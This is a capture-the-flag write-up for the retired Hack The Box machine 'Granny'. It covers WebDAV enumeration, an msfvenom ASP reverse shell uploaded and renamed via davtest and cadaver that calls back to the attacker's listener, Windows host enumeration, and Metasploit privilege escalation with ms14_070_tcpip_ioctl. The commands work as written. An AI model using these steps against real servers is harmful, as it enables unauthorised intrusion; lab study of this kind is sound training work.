This is a writeup for the retired Hack The Box Granny
machine.
- Hack The Box Machine address
- Machine IP: 10.10.10.15
Solution summary
- Outdated Microsoft IIS version 6.0 with WebDAV vulnerability CVE-2017-7269
- WebDAV vulnerability lets you upload an .asp payload and launch a user reverse shell
- An unpatched version of Windows is susceptible to privilege escalation, allowing us to escalate to root shell with Metasploit using a CVE-2014-4076 TCP/IP IOCTL exploit
Solution
Nmap
nmap -oX machines/granny/nmap.xml -sV -A -sC 10.10.10.15
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-07 09:29 JST
Nmap scan report for 10.10.10.15
Host is up (0.089s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Date: Sat, 07 Sep 2024 00:19:22 GMT
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.73 seconds
Findings:
- Runs Windows
- Old version of Microsoft IIS (6.0)
- WebDAV available on this server, CVE-2017-7269 exploitable
WebDAV
Let’s see if davtest
gives us anything
useful:
davtest.pl -url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: tmBBHB93Jv8eP5
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5
********************************************************
Sending test files
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jhtml
PUT html SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.cfm
PUT php SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.php
PUT asp FAIL
PUT shtml FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.pl
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jsp
PUT aspx FAIL
PUT cgi FAIL
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
********************************************************
Checking for test file execution
EXEC jhtml FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
EXEC cfm FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC jsp FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
********************************************************
/etc/profiles/per-user/justusperlwitz/bin/davtest.pl Summary:
Created: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jhtml
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.cfm
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.php
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.pl
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jsp
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
Executes: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
Executes: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
We can list the files using cadaver:
echo "ls" | cadaver http://10.10.10.15
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_tmBBHB93Jv8eP5 0 Sep 7 09:26
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
Creating and uploading a reverse shell payload
Time to get out the big (Metasploit) guns, and make us a nice ASP reverse
shell. First, we create a non-Meterpreter reverse shell using msfvenom
. We
set it up so that we listen locally using socat
on port 4444
.
# socat -d TCP4-LISTEN:4444 STDIO
# This payload does not rely on meterpreter
msfvenom -p windows/shell_reverse_tcp \
--platform windows \
--arch x86 \
RHOST=10.10.10.15 \
LHOST="10.10.16.2" \
LPORT=4444 -f asp \
> machines/granny/msfvenom_shell.asp
Then, using davtest.pl
and cadaver
, we upload the shell as shell.html
and
rename it to shell.asp
.
davtest.pl -url http://10.10.10.15 \
-uploadfile machines/granny/msfvenom_shell.asp \
-uploadloc 'shell.html'
echo "move shell.html shell.asp" | cadaver http://10.10.10.15
We now trigger the RCE:
curl -v "http://10.10.10.15/shell.asp"
Host enumeration
We connected successfully. Let’s take a closer look at the system:
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
We’re just network service
, so we can’t read out the administrator flag.
Let’s find all users and groups:
c:\windows\system32\inetsrv>net users
User accounts for \\GRANNY
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
SUPPORT_388945a0
The command completed successfully.
The user Lakis
looks interesting. The group are:
c:\windows\system32\inetsrv>net localgroup
net localgroup
Aliases for \\GRANNY
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*IIS_WPG
*Network Configuration Operators
*OWS_209498277_admin
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
The command completed successfully.
We inspect a few users:
c:\windows\system32\inetsrv>net user IWAM_GRANPA
net user IWAM_GRANPA
User name IWAM_GRANPA
Full Name Launch IIS Process Account
Comment Built-in account for Internet Information Services to start out of process applications
User's comment Built-in account for Internet Information Services to start out of process applications
Country code 000 (System Default)
Account active Yes
[...]
Local Group Memberships *IIS_WPG
Global Group memberships *None
[...]
c:\windows\system32\inetsrv>net user LAKIS
net user LAKIS
User name Lakis
Full Name Papalakis
Comment
User's comment
Country code 000 (System Default)
Account active Yes
[...]
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Here are the results from running netstat -ano
:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:1027 0.0.0.0:0 LISTENING 404
TCP 0.0.0.0:5859 0.0.0.0:0 LISTENING 4
TCP 10.10.10.15:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.15:1037 10.10.16.2:4444 ESTABLISHED 3900
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING 1936
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 404
UDP 0.0.0.0:1026 *:* 732
UDP 0.0.0.0:4500 *:* 404
UDP 10.10.10.15:123 *:* 768
UDP 10.10.10.15:137 *:* 4
UDP 10.10.10.15:138 *:* 4
UDP 127.0.0.1:123 *:* 768
UDP 127.0.0.1:1029 *:* 768
Dump all firewall info:
c:\windows\system32\inetsrv>netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Disable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
80 TCP Enable IIS
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 8 Allow inbound echo request
Log configuration:
-------------------------------------------------------------------
File location = C:\WINDOWS\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
Access is denied.
We review all network interface information:
c:\windows\system32\inetsrv>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : granny
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-A9-25
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.10.10.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
DNS Servers . . . . . . . . . . . : 10.10.10.2
c:\windows\system32\inetsrv>route print
route print
IPv4 Route Table
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x10003 ...00 50 56 b9 a9 25 ...... Intel(R) PRO/1000 MT Network Connection
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.10.10.2 10.10.10.15 10
10.10.10.0 255.255.255.0 10.10.10.15 10.10.10.15 10
10.10.10.15 255.255.255.255 127.0.0.1 127.0.0.1 10
10.255.255.255 255.255.255.255 10.10.10.15 10.10.10.15 10
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
224.0.0.0 240.0.0.0 10.10.10.15 10.10.10.15 10
255.255.255.255 255.255.255.255 10.10.10.15 10.10.10.15 1
Default Gateway: 10.10.10.2
===========================================================================
Persistent Routes:
None
c:\windows\system32\inetsrv>arp -A
arp -A
Interface: 10.10.10.15 --- 0x10003
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-cc-3b dynamic
Using Meterpreter
We might as well just use Meterpreter at this point, to finish this particular box.
# msfconsole
set RHOSTS 10.10.10.15
set LHOST 10.10.16.2
set LPORT 4444
use exploit/windows/iis/iis_webdav_upload_asp
run
# inside meterpreter, run
# > background
# We're in yay
# but getsystem don't do nothing
Metasploit is convenient. I don’t even have to pretend that I know how to hack Windows systems anymore:
use post/multi/recon/local_exploit_suggester
set SESSION 1
exploit
# Kaboom
After enumerating vulnerabilities in this system, we see the following candidates:
exploit/windows/local/ms10_015_kitrap0d
The service is running, but could not be validated.
exploit/windows/local/ms14_058_track_popup_menu
The target appears to be vulnerable.
exploit/windows/local/ms14_070_tcpip_ioctl
The target appears to be vulnerable.
exploit/windows/local/ms15_051_client_copy_image
The target appears to be vulnerable.
exploit/windows/local/ms16_016_webdav
The service is running, but could not be validated.
exploit/windows/local/ppr_flatten_rec
The target appears to be vulnerable.
Let’s try a few exploits:
# First, we migrate to another user process, w3wp.exe
# (whatever that means, might as well just say zoom and enhance)
# migrate 3728
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
exploit
sessions -i 2
Then, we find the flags:
meterpreter > dir "C:/Documents and Settings"
Listing: C:/Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-04-13 03:48:10 +0900 Administrator
040777/rwxrwxrwx 0 dir 2017-04-12 23:03:34 +0900 All Users
040777/rwxrwxrwx 0 dir 2017-04-12 23:04:48 +0900 Default User
040777/rwxrwxrwx 0 dir 2017-04-13 04:19:46 +0900 Lakis
040777/rwxrwxrwx 0 dir 2017-04-12 23:08:32 +0900 LocalService
040777/rwxrwxrwx 0 dir 2017-04-12 23:08:31 +0900 NetworkService
[...]
meterpreter > dir "C:/Documents and Settings/Lakis/Desktop"
Listing: C:/Documents and Settings/Lakis/Desktop
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-13 04:20:07 +0900 user.txt
meterpreter > cat "C:/Documents and Settings/Lakis/Desktop/user.txt"
[...]
meterpreter > dir "C:/Documents and Settings/Administrator/Desktop"
Listing: C:/Documents and Settings/Administrator/Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-13 04:17:07 +0900 root.txt
meterpreter > cat "C:/Documents and Settings/Administrator/Desktop/root.txt"
[...]
The flags are:
- User flag:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Root flag:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX